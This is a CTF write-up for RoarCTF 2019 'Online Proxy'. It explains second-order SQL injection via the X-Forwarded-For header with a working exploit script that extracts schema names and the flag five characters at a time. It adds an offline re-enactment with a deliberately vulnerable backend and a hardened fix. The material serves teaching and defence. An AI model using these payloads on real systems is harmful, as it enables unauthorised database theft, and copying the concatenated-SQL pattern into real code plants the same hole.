[RoarCTF 2019]Online Proxy


0x00 Key Points

X-Forwarded-For (XFF) header injection, second-order: the header value is stored as the client IP and only becomes injectable when a later request re-uses the stored value

0x01 Solution

Open the challenge and view the page source: it shows the client IP, which suggests the client's IP address is being recorded in the database.
Testing shows that changing X-Forwarded-For changes the echoed value, which locates the injection point. Note that the injection is second-order: as the comments in the script below show, the payload is stored as the IP and only executes when the next request looks up the "last IP", so every probe needs one request to plant the payload, one to trigger it and one to read the result.
Script:
https://github.com/berTrAM888/RoarCTF-Writeup-some-Source-Code/blob/master/Web/online_proxy/writeup/Exp.py

#!/usr/bin/env python3

import requests

target = "http://localhost:8302/"

def execute_sql(sql):
    print("[*] Query: " + sql)
    return_result = ""

    # Step 1: get the length of the result. The header value is stored, not
    # queried directly, so the expression is planted first and only evaluates
    # on the following request (second-order injection).
    payload = "0'|length((" + sql + "))|'0"
    session = requests.session()
    r = session.get(target, headers={'X-Forwarded-For': payload})   # store the payload as the current IP
    r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})  # looking up the last IP triggers the injection
    r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})  # query again to read the result
    start_pos = r.text.find("Last Ip: ")
    end_pos = r.text.find(" -->", start_pos)
    length = int(r.text[start_pos + 9: end_pos])   # 9 == len("Last Ip: ")
    print("[+] Length: " + str(length))

    # Step 2: read the result five characters per round. conv(hex(...),16,10)
    # turns the chunk into an integer so that 0|N|0 survives the bitwise OR
    # and N is echoed back in the "Last Ip" field.
    for i in range(1, length + 1, 5):
        payload = "0'|conv(hex(substr((" + sql + ")," + str(i) + ",5)),16,10)|'0"

        r = session.get(target, headers={'X-Forwarded-For': payload})   # plant the expression
        r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})  # second-order injection fires when the last IP is looked up
        r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})  # query again to read the result
        start_pos = r.text.find("Last Ip: ")
        end_pos = r.text.find(" -->", start_pos)
        result = int(r.text[start_pos + 9: end_pos])
        chunk_hex = hex(result)[2:]
        if len(chunk_hex) % 2:          # pad if the leading byte were below 0x10
            chunk_hex = '0' + chunk_hex
        chunk = bytes.fromhex(chunk_hex).decode('utf-8')
        return_result += chunk

        print("[+] Position " + str(i) + ": read five characters: " + chunk)

    return return_result


# enumerate databases
print("[+] Got: " + execute_sql("SELECT group_concat(SCHEMA_NAME) FROM information_schema.SCHEMATA"))

# enumerate tables in the database
print("[+] Got: " + execute_sql("SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e'"))

# enumerate columns in the table
print("[+] Got: " + execute_sql("SELECT group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e' AND TABLE_NAME = 'F4l9_t4b1e' "))

# dump the contents of the column
print("[+] Got: " + execute_sql("SELECT group_concat(F4l9_C01uMn) FROM F4l9_D4t4B45e.F4l9_t4b1e"))
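The script above only makes sense against a backend that stores the header and re-uses it later. The following offline re-enactment is an added example written for this page, not the challenge's source or part of Exp.py: `ProxyApp` is a hypothetical stand-in backend that binds the incoming X-Forwarded-For value as a parameter (so a first-order payload does nothing) but concatenates the previously stored value into a later UPDATE, which is exactly where a second-order payload fires. SQLite replaces MySQL, so MySQL's `CONV()` is emulated with `create_function`, the `information_schema` steps are skipped, and the table `F4l9_t4b1e`, the secret in it, and the `<!-- Last Ip: ... -->` page layout are constructed assumptions taken from the script's own queries and parsing. `probe()` performs the same three-request dance as Exp.py, `exfiltrate()` reproduces its length-then-five-characters loop, and `ProxyApp(safe=True)` shows the same payload coming back as literal text once the stored value is bound too.

```python
#!/usr/bin/env python3
"""Offline re-enactment of the second-order X-Forwarded-For injection.

Constructed example for this page: ProxyApp is a stand-in backend, not the
challenge's real source. It keeps the two properties the exploit depends on:
the incoming XFF value is written with a bound parameter (first-order
injection fails), but the previously stored value is concatenated into a
later UPDATE, and that is where the planted expression executes.
SQLite replaces MySQL; MySQL's CONV() is emulated with create_function().
"""
import sqlite3

SECRET = "flag{constructed_example_value}"   # constructed sample data
TABLE_SQL = "SELECT group_concat(F4l9_C01uMn) FROM F4l9_t4b1e"


def _conv(s, from_base, to_base):
    """Minimal stand-in for MySQL CONV(); only the base-16 -> base-10 case is used."""
    return None if s is None else int(str(s), from_base)


class ProxyApp:
    """Hypothetical backend: remembers the current IP and the one seen before it."""

    def __init__(self, safe=False):
        self.safe = safe
        self.db = sqlite3.connect(":memory:")
        self.db.create_function("conv", 3, _conv)
        self.db.executescript(
            "CREATE TABLE state (current_ip TEXT, last_ip TEXT);"
            "INSERT INTO state VALUES ('1.1.1.1', '');"
            "CREATE TABLE F4l9_t4b1e (F4l9_C01uMn TEXT);"
        )
        self.db.execute("INSERT INTO F4l9_t4b1e VALUES (?)", (SECRET,))

    def _state(self):
        return self.db.execute("SELECT current_ip, last_ip FROM state").fetchone()

    def get(self, xff):
        """One GET with the given X-Forwarded-For value; returns the page body."""
        current, last = self._state()
        if xff != current:
            if self.safe:
                # hardened: both values bound, the stored one included
                self.db.execute("UPDATE state SET last_ip = ?, current_ip = ?", (current, xff))
            else:
                # vulnerable: new value bound, stored value concatenated (second-order)
                self.db.execute(f"UPDATE state SET last_ip = '{current}', current_ip = ?", (xff,))
            current, last = self._state()
        # page layout assumed from the exploit's parsing of "Last Ip: ... -->"
        return f"<html><!-- Last Ip: {last} --></html>"


def read_last_ip(body):
    """Same extraction as Exp.py: text between 'Last Ip: ' and ' -->'."""
    start = body.find("Last Ip: ") + len("Last Ip: ")
    return body[start:body.find(" -->", start)]


def probe(app, expr):
    """Plant `expr` as the IP, trigger it with a second request, read it back with a third."""
    app.get(expr)                        # stored as current_ip through a bound parameter
    app.get("glzjin")                    # copied into last_ip by concatenation: fires here
    return read_last_ip(app.get("glzjin"))


def exfiltrate(app, sql):
    """Same chunked technique as Exp.py: length first, then five characters per probe."""
    length = int(probe(app, f"0'|length(({sql}))|'0"))
    out = ""
    for i in range(1, length + 1, 5):
        n = int(probe(app, f"0'|conv(hex(substr(({sql}),{i},5)),16,10)|'0"))
        h = format(n, "x")
        out += bytes.fromhex(h if len(h) % 2 == 0 else "0" + h).decode()
    return out


if __name__ == "__main__":
    print("vulnerable:", exfiltrate(ProxyApp(), TABLE_SQL))
    print("hardened  :", probe(ProxyApp(safe=True), "0'|length((SELECT 'x'))|'0"))
```

Against the vulnerable app the length probe echoes `31` and the loop reassembles the secret; against the hardened app the same payload is echoed back verbatim, because once the stored value is bound as a parameter there is no query text left for it to alter.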

Reference
https://github.com/berTrAM888/RoarCTF-Writeup-some-Source-Code/blob/master/Web/online_proxy/writeup/Exp.py
